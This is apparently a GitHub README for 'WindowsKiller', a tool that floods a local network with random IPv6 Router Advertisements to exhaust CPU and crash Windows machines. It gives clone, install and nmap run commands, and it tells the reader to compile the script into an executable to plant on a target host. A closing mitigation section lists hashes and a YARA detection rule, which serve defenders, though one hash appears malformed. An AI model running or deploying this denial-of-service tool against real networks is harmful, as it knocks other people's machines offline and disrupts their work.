WindowsKiller
WindowsKiller copied to clipboard
Generates a flood of Router Advertisements (RA) with random source MAC addresses and IPv6 prefixes. Computers, which have stateless autoconfiguration enabled by default (every major OS), will start to...
Windows Killer

Generates a flood of Router Advertisements (RA) with random source MAC addresses and IPv6 prefixes. Computers, which have stateless autoconfiguration enabled by default (every major OS), will start to compute IPv6 suffix and update their routing table to reflect the accepted announcement. This will cause 100% CPU usage on Windows and platforms, preventing to process other application requests.
Install
git clone https://github.com/Kleptocratic/WindowsKiller.git
Check for location of other NSE scripts
find / -name '*.nse'
Move downloaded files into directory
sudo mv WindowsKiller.nse /usr/local/share/nmap/scripts/
Execute script
nmap -6 --script WindowsKiller.nse --script-args 'interface=
WindowKiller.py
Designed as an eternal loop to be compiled as an executable and placed on target host, the script will pseudo-generate IPv6 Router Advertisements and flood the network with potential connections. Warning: this script will crash most, if not all, Windows operating systems within the LAN. This script is for educational purposes only. Be wise, stay legal.
Compiling WindowsKiller.py as an Executable
Install PyInstaller from PyPI:
pip install pyinstaller
Go to your program’s directory and run:
pyinstaller --onefile WindowsKiller.py
Navigate to the "dist" file to find your executable!
VirusTotal

Mitigation
Hashes
Mac OSX - ed664d8bf41bb35ca3f09fb5c913a747cace873ec318d5857b0fe2cceb08089c
Linux - 4b8f3ef3376463bd4e9c92c4e20a61e33baf9648336ed7abcc17dd14299b918b
Windows - 13bc596bff3a37113f6f36c1b1c6a836ac7391169ab53d1ad8ba72d39900808
YARA Rule for Detection
rule WindowsKillerExecutable {
meta:
description = "Detects Windows Killer IPv6 Router Advertisement Denial of Service Executable"
date = "2022-02-27"
linuxhash = "4b8f3ef3376463bd4e9c92c4e20a61e33baf9648336ed7abcc17dd14299b918b"
machash = "ed664d8bf41bb35ca3f09fb5c913a747cace873ec318d5857b0fe2cceb08089c"
windowshash = "13bc596bff3a37113f6f36c1b1c6a836ac7391169ab53d1ad8ba72d39900808"
strings:
$ = "_MEIPASS"
$ = "PyMem_RawFree"
$ = "sWindowsKiller"
$ = "importlib.machinery"
$ = "blib-dynload/_random.cpython"
condition:
all of them
}